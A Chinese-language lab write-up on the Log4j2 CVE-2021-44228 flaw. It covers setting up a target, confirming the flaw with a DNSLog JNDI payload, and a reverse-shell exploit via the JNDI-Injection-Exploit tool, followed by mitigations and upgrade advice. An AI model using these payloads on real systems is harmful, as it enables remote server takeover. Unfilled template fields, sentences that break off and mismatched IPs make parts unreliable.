Log4j2远程代码执行漏洞研究报告
一、漏洞信息搜集
1.1 漏洞信息表
漏洞名称 | Log4j2远程代码执行漏洞 |
发布时间 | 2021年12月10日 |
漏洞编号 | CVE-2021-44228 |
威胁类型 | 远程代码执行 |
危害级别 | 高危 |
影响版本 | Apache Log4j2 2.0 - 2.15.0-rc1 |
漏洞描述 | 产品介绍:Apache Log4j是一个Java日志框架,用于在应用程序中生成日志消息。它是Apache软件基金会的一个开源项目,提供了一个灵活且可配置的日志记录解决方案。 Log4j的主要目标是帮助开发人员记录和管理应用程序中的关键信息。通过在代码中插入适当的日志语句,开发人员可以捕捉程序运行时的各种事件和状态信息。这些日志消息可以用于调试、故障排除、性能分析以及记录重要的业务操作。 漏洞概述:这是一个Apache Log4j 2.x的远程代码执行漏洞,这个漏洞已经被广泛利用,因为Log4j是一个常用的Java日志记录库,很多应用程序都使用它来记录日志。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。 危害说明:攻击者可以通过构造恶意的请求,向受影响的服务器发送特殊的数据包,从而导致服务器执行远程代码。 |
漏洞指纹 | 常用端口/协议:不基于端口或协议 请求参数/关键路径(漏洞入口): |
漏洞验证与利用 | POC: EXP: 集成工具: |
修复建议 | 正式修复方案: 临时修复方案: |
参考链接 | 文章标题:链接 |
二、漏洞快速验证
2.1 漏洞靶机搭建
Log4j2 2.14.1
CC 3.2.1
方法一:直接加载漏洞环境(推荐)
在线靶场:vulfocus(http://vulfocus.io/#/dashboard)
在vulfocus靶场中找到Apache Log4j2远程命令执行(CVE-2021-44228)并启动
方法二:
1.安装docker和docker-compose
sudo apt-get install docker
sudo apt-get install python3-pip
pip3 install docker-compose
2.2 POC漏洞验证
通过DNSLog平台(http://www.dnslog.cn/)获取到域名,构造payload ,游览器点击?????使用Burp进行抓包,并且抓包替换payload参数
替换payload为${jndi:ldap://king.2f8db4e5.dns.1433.eu.org/exp}并发包
也可以使用Burp自带的URL编码进行编码,然后再次发包
三、漏洞利用实践
EXP 1:
JNDI注入反弹shell
使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用:
下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
执行EXP,生成可用的payload
码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定kali的ip地址
漏洞修复实践
4.1 修复方案1:临时修复方案
1.设置jvm参数 -Dlog4j2.formatMsgNoLookups=true。由于Java RMI,的实现依赖于JVM,所以可以通过调用JVM来修改。
2.设置log4j2.formatMsgNoLookups=True。
3.采用waf对请求流量中的${jndi进行拦截。通过对拦截JNDI语句来防止JNDI注入。
4.禁止不必要的业务访问外网,配置网络防火墙,禁止系统主动外连网络,包含不限于DNS、TCP/IP、ICMP。
4.2 修复方案2:标准解决方案
Apache官方发布新版本对漏洞修复
(详细说明工程化的应用环境条件、具体过程以及注意事项等)
代码解析
(针对工程化程序的总体架构进行讲解,并对关键功能模块进行解析等。)
五、漏洞原理分析
漏洞原理分析
apache.logging.log4j.core.lookup.StrSubstitutor(提取字符串,并通过 lookup 进行内容替换)
日志在打印时当遇到
由于log4j2 支持很多协议,例如通过 ldap 查找变量,通过 docker 查找变量,通过rmi等等。目前看到使用最多的主要是使用ldap来构造payload:
${jndi:ldap://ip/port/exp}
最终效果就是通过
整个利用流程分两步:
第一步:向目标发送指定
第二步:目标服务器收到重定向请求之后,下载恶意
关于利用LDAP服务来进行注入攻击已经不是第一次了,JNDI注入,即某代码中存在JDNI的string可控的情况,可构造恶意RMI或者LDAP服务端,导致远程任意类被加载,造成任意代码执行。Fastjson RCE漏洞的利用也用到LDAP注入攻击,还有其他的一些。
漏洞修复分析
当用户输入信息时,应用程序中的log4j2组件会将信息记录到日志中
假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp},log4j就会去解析该信息,通过jndi的lookup()方法去解析该URL:ldap:192.168.96.1:1099/exp
解析到ldap,就会去192.168.61.129:1099的ldap服务找名为shell的资源,如果找不到就会去http服务中找
在http中找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入
攻击者就可以通过shell实现任意的命令执行,造成严重危害
修复这个漏洞的推荐方法是升级到Log4j2版本2.17.0或更高版本。以下几个补丁方案:
将log4j-core库文件(log4j-core-2.14.1.jar)替换为修复了漏洞的版本。可以从Apache Log4j官方网站下载最新的修复版本。
移除log4j-core库文件,如果应用程序不需要此库文件的其他功能。这可以通过删除类路径中的相关Jar文件来实现。注意,这可能会影响应用程序的日志功能,因此在执行此操作前应进行测试。
在应用程序的配置文件中添加如下代码来阻止利用该漏洞的特定JNDI功能调用:
<ContextJndiFilter exclude=".*"/>
这些补丁方案可以帮助减轻漏洞的风险,最好还是尽快升级到修复了漏洞的版本,以确保系统的安全性。